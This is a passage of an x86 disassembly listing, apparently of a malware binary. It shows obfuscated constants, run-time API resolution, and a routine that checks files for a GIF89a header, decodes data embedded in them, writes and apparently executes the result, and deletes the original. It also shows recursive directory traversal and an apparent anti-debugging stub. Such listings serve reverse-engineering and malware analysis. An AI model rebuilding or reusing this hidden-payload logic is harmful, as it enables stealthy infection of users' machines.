mov eax, ds:10013268h
dec eax
sub ebx, eax
mov eax, ds:10013274h
add eax, ds:10013278h
add eax, [ebp+arg_0]
mov [ebp+arg_0], eax
movsx eax, word ptr ds:10013208h
movsx edx, word ptr ds:10013144h
add eax, edx
sub eax, 7
lea esi, [esi+eax]
loc_41D2A0: ; CODE XREF: sub_41D22D+2F�j
mov eax, ds:1001312Ch
add eax, ds:100131A8h
sub eax, 7
cmp ebx, eax
jnb short loc_41D265
movsx eax, word ptr ds:100130E8h
dec eax
cmp ebx, eax
jbe short loc_41D32F
push 3
movsx eax, word ptr ds:10013100h
movsx edx, word ptr ds:10013218h
add eax, edx
sub eax, 8
push eax
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10011644h
push ebx
push [ebp+arg_0]
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10011638h
push esi
lea eax, [ebp+var_7]
push eax
call sub_421D3F
add esp, 20h
mov eax, ds:1001317Ch
movsx edx, word ptr ds:1001327Ch
add eax, edx
sub eax, 6
mov byte ptr [esi+eax], 3Dh
mov eax, ds:1001312Ch
sub eax, 7
cmp ebx, eax
jnz short loc_41D324
mov eax, ds:10013274h
inc eax
mov byte ptr [esi+eax], 3Dh
loc_41D324: ; CODE XREF: sub_41D22D+EB�j
mov eax, ds:1001312Ch
sub eax, 4
lea esi, [esi+eax]
loc_41D32F: ; CODE XREF: sub_41D22D+8F�j
mov eax, ds:10013238h
movsx edx, word ptr ds:100130A4h
add eax, edx
sub eax, 6
mov edx, ds:10013244h
sub edx, 4
mov [esi+eax], dl
xor eax, eax
inc eax
loc_41D34F: ; CODE XREF: sub_41D22D+33�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D22D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D354 proc near ; CODE XREF: sub_41DE82+22E�p
; sub_41DE82+240�p
var_61DA0 = dword ptr -61DA0h
var_61D9C = dword ptr -61D9Ch
var_61D98 = byte ptr -61D98h
var_61C99 = byte ptr -61C99h
var_61C98 = dword ptr -61C98h
var_61C91 = byte ptr -61C91h
var_30F51 = byte ptr -30F51h
var_30F50 = dword ptr -30F50h
var_30F4B = byte ptr -30F4Bh
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30E3E = byte ptr -30E3Eh
var_30E3D = byte ptr -30E3Dh
var_30E3C = byte ptr -30E3Ch
var_30E3B = byte ptr -30E3Bh
var_30E3A = byte ptr -30E3Ah
var_30E15 = byte ptr -30E15h
var_30E14 = byte ptr -30E14h
var_30DC4 = byte ptr -30DC4h
var_30DBE = byte ptr -30DBEh
var_30DBD = byte ptr -30DBDh
var_30DBC = byte ptr -30DBCh
var_30D4E = byte ptr -30D4Eh
var_30D46 = byte ptr -30D46h
var_30D43 = byte ptr -30D43h
var_30D40 = byte ptr -30D40h
var_30D3F = byte ptr -30D3Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 61DA0h
call sub_425379
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
and [ebp+var_30F50], 0
push 0
mov eax, ds:10013244h
movsx edx, word ptr ds:100130FCh
add eax, edx
sub eax, 0Ah
push eax
push 3
push 0
mov eax, ds:10013094h
sub eax, 6
push eax
push 80000000h
push [ebp+arg_0]
call dword ptr ds:10012788h
mov [ebp+var_30E48], eax
cmp eax, 0FFFFFFFFh
jz loc_41D7D4
push 0
lea eax, [ebp+var_30E4C]
push eax
mov eax, ds:10013108h
add eax, 7Eh
add eax, ds:100130C8h
push eax
lea eax, [ebp+var_30E3F]
push eax
push [ebp+var_30E48]
call dword ptr ds:1000D028h
mov [ebp+var_30E44], eax
movsx eax, word ptr ds:1001316Ch
dec eax
cmp [ebp+var_30E44], eax
jz loc_41D7B6
cmp [ebp+var_30E3F], 47h
jnz short loc_41D427
cmp [ebp+var_30E3E], 49h
jnz short loc_41D427
cmp [ebp+var_30E3D], 46h
jnz short loc_41D427
cmp [ebp+var_30E3C], 38h
jnz short loc_41D427
cmp [ebp+var_30E3B], 39h
jnz short loc_41D427
cmp [ebp+var_30E3A], 61h
jz short loc_41D42C
loc_41D427: ; CODE XREF: sub_41D354+A4�j
; sub_41D354+AD�j ...
jmp loc_41D7B6
; ---------------------------------------------------------------------------
loc_41D42C: ; CODE XREF: sub_41D354+D1�j
movzx eax, [ebp+var_30E15]
movsx edx, word ptr ds:100131DCh
mov ecx, ds:10013164h
lea edx, [edx+ecx+36h]
cmp eax, edx
jnz short loc_41D45A
cmp [ebp+var_30DBE], 3Dh
jnz short loc_41D45A
cmp [ebp+var_30DBD], 3Dh
jz short loc_41D45F
loc_41D45A: ; CODE XREF: sub_41D354+F2�j
; sub_41D354+FB�j
jmp loc_41D7B6
; ---------------------------------------------------------------------------
loc_41D45F: ; CODE XREF: sub_41D354+104�j
or ebx, ebx
jnz short loc_41D48E
mov al, [ebp+var_30DBC]
mov [ebp+var_30F51], al
call sub_4231B3
mov edx, eax
mov [ebp+var_61C99], dl
mov al, [ebp+var_61C99]
cmp al, [ebp+var_30F51]
jz loc_41D7B6
loc_41D48E: ; CODE XREF: sub_41D354+10D�j
push 0
lea eax, [ebp+var_30E4C]
push eax
push 30D40h
lea eax, [ebp+var_61C91]
push eax
push [ebp+var_30E48]
call dword ptr ds:1000D028h
mov [ebp+var_30E44], eax
mov eax, ds:10013094h
sub eax, 6
cmp [ebp+var_30E44], eax
jz loc_41D7B6
mov eax, [ebp+var_30E4C]
mov edx, ds:10013110h
add edx, ds:10013268h
sub edx, 9
mov [ebp+eax+var_61C91], dl
push 30D40h
lea eax, [ebp+var_30D40]
push eax
lea eax, [ebp+var_61C91]
push eax
call sub_41A755
add esp, 0Ch
mov esi, eax
mov eax, ds:10013184h
mov edi, eax
add edi, ds:10013210h
sub edi, 3
jmp short loc_41D559
; ---------------------------------------------------------------------------
loc_41D514: ; CODE XREF: sub_41D354+207�j
or ebx, ebx
jz short loc_41D52B
movzx eax, [ebp+edi+var_30D40]
sub eax, edi
mov [ebp+edi+var_30D40], al
jmp short loc_41D558
; ---------------------------------------------------------------------------
loc_41D52B: ; CODE XREF: sub_41D354+1C2�j
movzx eax, [ebp+edi+var_30D40]
mov [ebp+var_61D9C], eax
mov eax, edi
mul edi
mov [ebp+var_61DA0], eax
mov eax, [ebp+var_61D9C]
mov edx, [ebp+var_61DA0]
sub eax, edx
mov [ebp+edi+var_30D40], al
loc_41D558: ; CODE XREF: sub_41D354+1D5�j
inc edi
loc_41D559: ; CODE XREF: sub_41D354+1BE�j
cmp edi, esi
jb short loc_41D514
or ebx, ebx
jz short loc_41D57A
mov eax, ds:10013254h
sub eax, 8
mov edx, esi
sub edx, eax
mov eax, ds:10013274h
dec eax
mov [ebp+edx+var_30D40], al
loc_41D57A: ; CODE XREF: sub_41D354+20B�j
movsx eax, word ptr ds:10013104h
mov edx, ds:100130A0h
movsx ecx, word ptr ds:100130E8h
add edx, ecx
sub edx, 5
mov [ebp+eax+var_30DC4], dl
push 0FFh
lea eax, [ebp+var_61D98]
push eax
lea eax, [ebp+var_30E14]
push eax
call sub_41A755
lea eax, [ebp+var_61D98]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
call sub_41E6CD
add esp, 18h
mov [ebp+var_30E44], eax
mov eax, ds:1001309Ch
sub eax, 5
cmp [ebp+var_30E44], eax
jnz loc_41D7B6
mov [ebp+var_30F50], 1
or ebx, ebx
jz loc_41D713
mov eax, ds:1001325Ch
add eax, ds:1001319Ch
cmp [ebp+eax+var_30D4E], 64h
jnz short loc_41D683
movzx eax, [ebp+var_30D3F]
movsx edx, word ptr ds:100131FCh
add edx, 1Bh
sub eax, edx
mov byte ptr [ebp+var_61D9C+3], al
movzx eax, byte ptr [ebp+var_61D9C+3]
push eax
push 0
call sub_42291E
mov eax, ds:1001325Ch
sub eax, 8
mov ds:1000F620h, eax
mov eax, ds:100130ACh
dec eax
mov ds:10013350h, eax
mov eax, ds:10013148h
movsx edx, word ptr ds:100130C0h
sub edx, 2
mov [ebp+eax+var_30D40], dl
movsx eax, word ptr ds:1001316Ch
movsx edx, word ptr ds:100130D0h
add eax, edx
sub eax, 7
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_41FCEB
add esp, 10h
loc_41D683: ; CODE XREF: sub_41D354+2B4�j
mov eax, ds:100130A8h
cmp [ebp+eax+var_30D46], 67h
jnz loc_41D7B6
movsx eax, word ptr ds:10013144h
movsx edx, word ptr ds:100130D0h
add eax, edx
mov edx, ds:10013128h
sub edx, 9
mov [ebp+eax+var_30D43], dl
lea eax, [ebp+var_30D3F]
push eax
call dword ptr ds:1000D054h
mov [ebp+var_61D9C], eax
push eax
push 10012670h
call sub_41CFF0
mov eax, ds:100130F0h
dec eax
mov ds:1000F620h, eax
movsx eax, word ptr ds:100130FCh
sub eax, 6
mov ds:10013350h, eax
movsx eax, word ptr ds:10013144h
add eax, ds:10013204h
sub eax, 6
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_41FCEB
add esp, 14h
jmp loc_41D7B6
; ---------------------------------------------------------------------------
loc_41D713: ; CODE XREF: sub_41D354+29B�j
movsx eax, word ptr ds:10013098h
add eax, 5
push eax
lea eax, [ebp+var_30F4B]
push eax
call sub_421760
push 10014333h
call sub_41E914
push eax
lea edx, [ebp+var_30F4B]
push edx
call dword ptr ds:1000D020h
push 0
push 80h
push 2
push 0
mov eax, ds:10013090h
sub eax, 3
push eax
push 40000000h
lea eax, [ebp+var_30F4B]
push eax
call dword ptr ds:10012788h
mov [ebp+var_61C98], eax
push 0
lea eax, [ebp+var_30E4C]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
push [ebp+var_61C98]
call dword ptr ds:10012B8Ch
push [ebp+var_61C98]
call dword ptr ds:10011654h
push 5
lea eax, [ebp+var_30F4B]
push eax
call dword ptr ds:1000F0E0h
movzx eax, [ebp+var_30F51]
push eax
call sub_41DD8F
add esp, 18h
loc_41D7B6: ; CODE XREF: sub_41D354+97�j
; sub_41D354:loc_41D427�j ...
push [ebp+var_30E48]
call dword ptr ds:10011654h
cmp [ebp+var_30F50], 0
jz short loc_41D7D4
push [ebp+arg_0]
call dword ptr ds:1000D008h
loc_41D7D4: ; CODE XREF: sub_41D354+52�j
; sub_41D354+475�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D354 endp
; =============== S U B R O U T I N E =======================================
sub_41D7D9 proc near ; CODE XREF: .data:0042102D�p
push edi
push 10014326h
call sub_41E914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132A4h, eax
test eax, eax
jnz short loc_41D80C
push 10014319h
call sub_41E914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132A4h, eax
loc_41D80C: ; CODE XREF: sub_41D7D9+1A�j
push 10014306h
call sub_41E914
push eax
push dword ptr ds:100132A4h
call dword ptr ds:1000F1F8h
mov ds:10012BB4h, eax
push 100142F2h
call sub_41E914
push eax
push dword ptr ds:100132A4h
call dword ptr ds:1000F1F8h
mov ds:1000F624h, eax
push 100142E2h
call sub_41E914
push eax
push dword ptr ds:100132A4h
call dword ptr ds:1000F1F8h
mov ds:1000F0D0h, eax
push 100142D0h
call sub_41E914
push eax
push dword ptr ds:100132A4h
call dword ptr ds:1000F1F8h
mov ds:1000F0D8h, eax
push 100142C1h
call sub_41E914
add esp, 14h
push eax
push dword ptr ds:100132A4h
call dword ptr ds:1000F1F8h
mov ds:10012648h, eax
pop edi
retn
sub_41D7D9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
pusha
mov esi, [ebp+10h]
mov eax, 10004A5Ch
mov [esi+0B8h], eax
mov eax, [ebp+0Ch]
mov [esi+0C4h], eax
popa
mov esp, ebp
pop ebp
xor eax, eax
retn
; ---------------------------------------------------------------------------
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_41D8C0 proc near ; CODE XREF: .data:00421028�p
push edi
push 100142B4h
call sub_41E914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132A0h, eax
test eax, eax
jnz short loc_41D8F3
push 100142A7h
call sub_41E914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132A0h, eax
loc_41D8F3: ; CODE XREF: sub_41D8C0+1A�j
push 10014298h
call sub_41E914
push eax
push dword ptr ds:100132A0h
call dword ptr ds:1000F1F8h
mov ds:10010250h, eax
push 10014286h
call sub_41E914
add esp, 8
push eax
push dword ptr ds:100132A0h
call dword ptr ds:1000F1F8h
mov ds:1000E120h, eax
pop edi
retn
sub_41D8C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D930 proc near ; CODE XREF: sub_422477+142�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_425379
push ebx
push esi
push edi
mov eax, ds:100131F4h
sub eax, 4
push eax
lea eax, [ebp+var_FFF]
push eax
call sub_42291E
add esp, 8
movsx edi, word ptr ds:10013100h
sub edi, 3
jmp short loc_41D97E
; ---------------------------------------------------------------------------
loc_41D964: ; CODE XREF: sub_41D930+54�j
cmp [ebp+edi+var_FFF], 23h
jnz short loc_41D97D
mov eax, ds:10013288h
sub eax, 6
mov [ebp+edi+var_FFF], al
loc_41D97D: ; CODE XREF: sub_41D930+3C�j
inc edi
loc_41D97E: ; CODE XREF: sub_41D930+32�j
cmp edi, 0FFFh
jb short loc_41D964
lea esi, [ebp+var_FFF]
loc_41D98C: ; CODE XREF: sub_41D930+EC�j
push 10014282h
call sub_41E914
push 1000E020h
mov ebx, ds:10013134h
movsx edx, word ptr ds:100130B0h
add ebx, edx
sub ebx, 0Fh
push ebx
mov ebx, ds:1001320Ch
movsx edx, word ptr ds:10013250h
add ebx, edx
sub ebx, 7
push ebx
push eax
mov ebx, ds:10013224h
sub ebx, 5
push ebx
push 0
push esi
push [ebp+arg_0]
mov ebx, ds:100131D4h
add ebx, ds:100131C4h
sub ebx, 5
and ebx, 0FFh
push ebx
call sub_41F465
add esp, 28h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41D9F5: ; CODE XREF: sub_41D930+CA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D9F5
movsx edx, word ptr ds:100131E0h
sub edx, 2
mov ebx, eax
add ebx, esi
mov esi, edx
add esi, ebx
movsx eax, byte ptr [esi]
mov edx, ds:1001325Ch
sub edx, 8
cmp eax, edx
jnz loc_41D98C
pop edi
pop esi
pop ebx
leave
retn
sub_41D930 endp
; ---------------------------------------------------------------------------
db 0B8h
dd 80004001h
db 0C2h, 10h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DA2F proc near ; CODE XREF: sub_422477+1A1�p
; sub_422477+1C2�p
var_4F = byte ptr -4Fh
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call dword ptr ds:10012770h
mov [ebp+var_8], eax
mov esi, ds:10013140h
sub esi, 9
jmp short loc_41DA96
; ---------------------------------------------------------------------------
loc_41DA4F: ; CODE XREF: sub_41DA2F+79�j
cmp dword ptr ds:1000E130h[esi*4], 0
jz short loc_41DA95
mov edx, ds:10011660h[esi*4]
mov ecx, ds:100130C8h
add ecx, 0EA5Fh
movsx eax, word ptr ds:100130E8h
add ecx, eax
mov eax, ds:100130A8h
add eax, ds:100131E8h
sub eax, 2
imul ecx, eax
add edx, ecx
cmp edx, [ebp+var_8]
jnb short loc_41DA95
and dword ptr ds:1000E130h[esi*4], 0
loc_41DA95: ; CODE XREF: sub_41DA2F+28�j
; sub_41DA2F+5C�j
inc esi
loc_41DA96: ; CODE XREF: sub_41DA2F+1E�j
mov eax, ds:100130F0h
add eax, 3E4h
add eax, ds:1001313Ch
cmp esi, eax
jb short loc_41DA4F
loc_41DAAA: ; CODE XREF: sub_41DA2F+99�j
; sub_41DA2F+281�j
mov eax, [ebx]
mov [ebp+var_14], eax
lea ebx, [ebx+eax]
mov eax, ebx
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb loc_41DCB6
mov eax, ds:10013244h
cmp [ebp+var_14], eax
ja short loc_41DAAA
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_41DACF: ; CODE XREF: sub_41DA2F+A5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41DACF
mov [ebp+var_10], eax
mov eax, ebx
sub eax, [ebp+arg_0]
movsx edx, word ptr ds:10013264h
add edx, ds:10013204h
sub edx, 6
sub eax, edx
mov [ebp+var_C], eax
mov [ebp+var_1], 44h
mov eax, ds:10013204h
sub eax, 1
cmp byte ptr [ebx+eax], 2Ah
jnz short loc_41DB09
mov [ebp+var_1], 43h
loc_41DB09: ; CODE XREF: sub_41DA2F+D4�j
mov edi, ds:100130ECh
sub edi, 4
jmp short loc_41DB3B
; ---------------------------------------------------------------------------
loc_41DB14: ; CODE XREF: sub_41DA2F+121�j
cmp dword ptr ds:1000E130h[edi*4], 0
jz short loc_41DB3A
mov edx, [ebp+var_C]
cmp ds:1000D060h[edi*4], edx
jnz short loc_41DB3A
mov dl, ds:1000F200h[edi]
cmp dl, [ebp+var_1]
jz loc_41DC95
loc_41DB3A: ; CODE XREF: sub_41DA2F+ED�j
; sub_41DA2F+F9�j
inc edi
loc_41DB3B: ; CODE XREF: sub_41DA2F+E3�j
mov eax, ds:10013194h
add eax, 3D9h
movsx edx, word ptr ds:100130FCh
add eax, edx
cmp edi, eax
jb short loc_41DB14
mov eax, ds:10013168h
add eax, 3BEh
movsx edx, word ptr ds:10013260h
add eax, edx
cmp [ebp+var_10], eax
jbe loc_41DC3E
mov eax, ds:100130F8h
add eax, 7
movsx edx, word ptr ds:1001316Ch
add eax, edx
push eax
lea eax, [ebp+var_4F]
push eax
call sub_421760
add esp, 8
mov eax, ds:100130ACh
add eax, 3BFh
mov [ebp+var_18], eax
movsx eax, word ptr ds:100130FCh
add eax, ds:100131F8h
sub eax, 9
mov [ebp+var_1C], eax
loc_41DBAC: ; CODE XREF: sub_41DA2F+20A�j
mov eax, [ebp+var_18]
mov al, [ebx+eax]
mov [ebp+var_1D], al
mov eax, [ebp+var_18]
mov edx, ds:10013114h
movsx ecx, word ptr ds:100131B4h
add edx, ecx
sub edx, 0Ch
mov [ebx+eax], dl
push 1000E020h
push [ebp+var_10]
push [ebp+var_1C]
lea eax, [ebp+var_4F]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov eax, ds:100131ECh
add eax, ds:100130A0h
sub eax, 0Ch
and eax, 0FFh
push eax
call sub_41F465
add esp, 24h
mov eax, [ebp+var_18]
mov dl, [ebp+var_1D]
mov [ebx+eax], dl
mov [ebp+var_1C], eax
mov eax, ds:100131B0h
add eax, 3B6h
movsx edx, word ptr ds:10013118h
add eax, edx
add [ebp+var_18], eax
mov eax, [ebp+var_10]
cmp [ebp+var_18], eax
jbe short loc_41DC31
mov [ebp+var_18], eax
loc_41DC31: ; CODE XREF: sub_41DA2F+1FD�j
mov eax, [ebp+var_10]
cmp [ebp+var_1C], eax
jnb short loc_41DC90
jmp loc_41DBAC
; ---------------------------------------------------------------------------
loc_41DC3E: ; CODE XREF: sub_41DA2F+139�j
push 1001427Dh
call sub_41E914
push 1000E020h
push [ebp+var_10]
movsx edx, word ptr ds:10013100h
add edx, ds:100131F8h
sub edx, 6
push edx
push eax
mov edx, [ebp+arg_C]
push dword ptr [edx]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
movsx edx, word ptr ds:100130FCh
movsx ecx, word ptr ds:100130D0h
add edx, ecx
sub edx, 0Dh
and edx, 0FFh
push edx
call sub_41F465
add esp, 28h
loc_41DC90: ; CODE XREF: sub_41DA2F+208�j
mov eax, [ebp+arg_C]
inc dword ptr [eax]
loc_41DC95: ; CODE XREF: sub_41DA2F+105�j
mov eax, [ebp+var_10]
lea ebx, [ebx+eax]
inc ebx
mov eax, [ebp+arg_C]
mov edx, ds:100131F8h
add edx, 0Bh
add edx, ds:10013094h
cmp [eax], edx
jbe loc_41DAAA
loc_41DCB6: ; CODE XREF: sub_41DA2F+8B�j
push 10014279h
call sub_41E914
push 1000E020h
movsx edx, word ptr ds:100131F0h
movsx ecx, word ptr ds:1001327Ch
add edx, ecx
sub edx, 7
push edx
movsx edx, word ptr ds:10013170h
sub edx, 2
push edx
push eax
mov edx, ds:10013140h
add edx, ds:10013244h
sub edx, 0Dh
push edx
push 0
push 0
push [ebp+arg_8]
mov edx, ds:100131ACh
add edx, ds:10013210h
sub edx, 5
and edx, 0FFh
push edx
call sub_41F465
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_41DA2F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2000h
call sub_425379
push esi
push edi
push 1FFFh
lea eax, [ebp-1FFFh]
push eax
push dword ptr [ebp+8]
call dword ptr ds:10012BA4h
push 10014264h
call sub_41E914
mov edi, ds:10013224h
add edi, ds:10013134h
sub edi, 0Ch
push edi
push eax
lea edi, [ebp-1FFFh]
push edi
call sub_41A8C2
add esp, 10h
mov esi, ds:10013198h
add esi, 0FFFDh
cmp eax, esi
jz short loc_41DD86
push dword ptr [ebp+8]
call sub_41B7BE
pop ecx
loc_41DD86: ; CODE XREF: .data:0041DD7B�j
xor eax, eax
inc eax
pop edi
pop esi
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DD8F proc near ; CODE XREF: sub_41D354+45A�p
var_270 = byte ptr -270h
var_26C = byte ptr -26Ch
var_267 = byte ptr -267h
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 26Ch
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000F600h
lea eax, [ebp+var_168]
push eax
call sub_421C67
push 1001425Fh
call sub_41E914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000D020h
push 10014257h
call sub_41E914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
add esp, 24h
movsx eax, word ptr ds:10013124h
add eax, ds:100131A0h
mov dl, [ebp+arg_0]
mov [ebp+eax+var_270], dl
push 0
push 80h
push 4
push 0
movsx eax, word ptr ds:10013170h
sub eax, 2
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10012788h
mov edi, eax
push 0
lea eax, [ebp+var_26C]
push eax
mov eax, ds:10013248h
inc eax
push eax
lea eax, [ebp+var_267]
push eax
push edi
call dword ptr ds:10012B8Ch
push edi
call dword ptr ds:10011654h
pop edi
pop esi
leave
retn
sub_41DD8F endp
; ---------------------------------------------------------------------------
db 0A1h, 0E4h, 31h
dd 0BF0F1001h, 131E015h, 83D00110h, 0FF5006E8h, 1266415h
db 10h, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DE82 proc near ; CODE XREF: sub_41DE82+299�p
; sub_41DE82+307�p ...
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 268h
push ebx
push esi
push edi
push 0
call dword ptr ds:10012630h
xor ebx, ebx
inc ebx
push 1001424Fh
call sub_41E914
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10012634h
add esp, 14h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10010258h
mov [ebp+var_248], eax
mov eax, ds:10013128h
movsx edx, word ptr ds:10013180h
add eax, edx
sub eax, 0Ch
neg eax
cmp [ebp+var_248], eax
jnz loc_41E0CF
movsx eax, word ptr ds:100131B4h
sub eax, 4
cmp [ebp+arg_20], eax
ja loc_41E198
movsx eax, word ptr ds:10013170h
mov edx, ds:10013268h
lea eax, [eax+edx+3FAh]
cmp [ebp+arg_24], eax
jnb short loc_41DF38
mov eax, ds:100131B0h
add eax, 95h
movsx edx, word ptr ds:10013150h
add eax, edx
cmp [ebp+arg_24], eax
jnz loc_41E198
loc_41DF38: ; CODE XREF: sub_41DE82+98�j
movsx eax, word ptr ds:100131C0h
add eax, 30D3Ch
cmp [ebp+arg_24], eax
ja loc_41E198
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call dword ptr ds:10012780h
mov [ebp+var_260], eax
mov eax, ds:1001323Ch
add eax, ds:100131BCh
sub eax, 0Eh
cmp [ebp+var_260], eax
jge short loc_41DF84
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_41DF8F
; ---------------------------------------------------------------------------
loc_41DF84: ; CODE XREF: sub_41DE82+F3�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
loc_41DF8F: ; CODE XREF: sub_41DE82+100�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call dword ptr ds:10012778h
movzx eax, [ebp+var_24E]
movzx edx, [ebp+var_250]
movsx ecx, word ptr ds:10013174h
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_252]
movsx ecx, word ptr ds:100131A4h
movsx esi, word ptr ds:10013124h
lea ecx, [ecx+esi+0Bh]
imul edx, ecx
mov ecx, ds:10013154h
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_256]
mov ecx, ds:10013268h
add ecx, 1Ah
imul edx, ecx
mov ecx, ds:10013140h
add ecx, 6
add ecx, ds:1001326Ch
imul edx, ecx
movsx ecx, word ptr ds:100130D8h
mov esi, ds:10013168h
lea ecx, [ecx+esi+3Ah]
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_258]
mov ecx, ds:10013270h
add ecx, 8
imul edx, ecx
movsx ecx, word ptr ds:10013150h
add ecx, 16h
imul edx, ecx
mov ecx, ds:100130C8h
add ecx, 0Fh
add ecx, ds:10013194h
imul edx, ecx
mov ecx, ds:1001310Ch
add ecx, 33h
add ecx, ds:100131A0h
imul edx, ecx
add eax, edx
mov [ebp+var_25C], eax
mov edx, ds:1000D024h
cmp eax, edx
ja loc_41E198
sub edx, eax
movsx eax, word ptr ds:1001327Ch
mov ecx, ds:10013128h
lea eax, [eax+ecx+7]
cmp edx, eax
jnb loc_41E198
movsx eax, word ptr ds:10013264h
add eax, 9Bh
cmp [ebp+arg_24], eax
jz short loc_41E0BD
push 0
push [ebp+arg_0]
call sub_41D354
add esp, 8
jmp loc_41E198
; ---------------------------------------------------------------------------
loc_41E0BD: ; CODE XREF: sub_41DE82+227�j
push 1
push [ebp+arg_0]
call sub_41D354
add esp, 8
jmp loc_41E198
; ---------------------------------------------------------------------------
loc_41E0CF: ; CODE XREF: sub_41DE82+68�j
cmp [ebp+var_112], 2Eh
jz loc_41E194
push 10014246h
call sub_41E914
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10012634h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_41DE82
add esp, 158h
jmp short loc_41E194
; ---------------------------------------------------------------------------
loc_41E128: ; CODE XREF: sub_41DE82+314�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call dword ptr ds:1000E004h
mov ebx, eax
or ebx, ebx
jz short loc_41E198
cmp [ebp+var_112], 2Eh
jz short loc_41E194
push 1001423Dh
call sub_41E914
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10012634h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_41DE82
add esp, 158h
loc_41E194: ; CODE XREF: sub_41DE82+254�j
; sub_41DE82+2A4�j ...
or ebx, ebx
jnz short loc_41E128
loc_41E198: ; CODE XREF: sub_41DE82+7B�j
; sub_41DE82+B0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41DE82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E19D proc near ; CODE XREF: sub_41F764+190�p
var_12110 = byte ptr -12110h
var_1210C = word ptr -1210Ch
var_1210A = word ptr -1210Ah
var_12108 = dword ptr -12108h
var_12104 = byte ptr -12104h
var_12000 = word ptr -12000h
var_11FFE = byte ptr -11FFEh
var_1FFF = byte ptr -1FFFh
var_1FB3 = byte ptr -1FB3h
var_1FB2 = byte ptr -1FB2h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 12110h
call sub_425379
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12104]
push eax
call sub_425399
lea ecx, [ebp+var_12104]
or eax, 0FFFFFFFFh
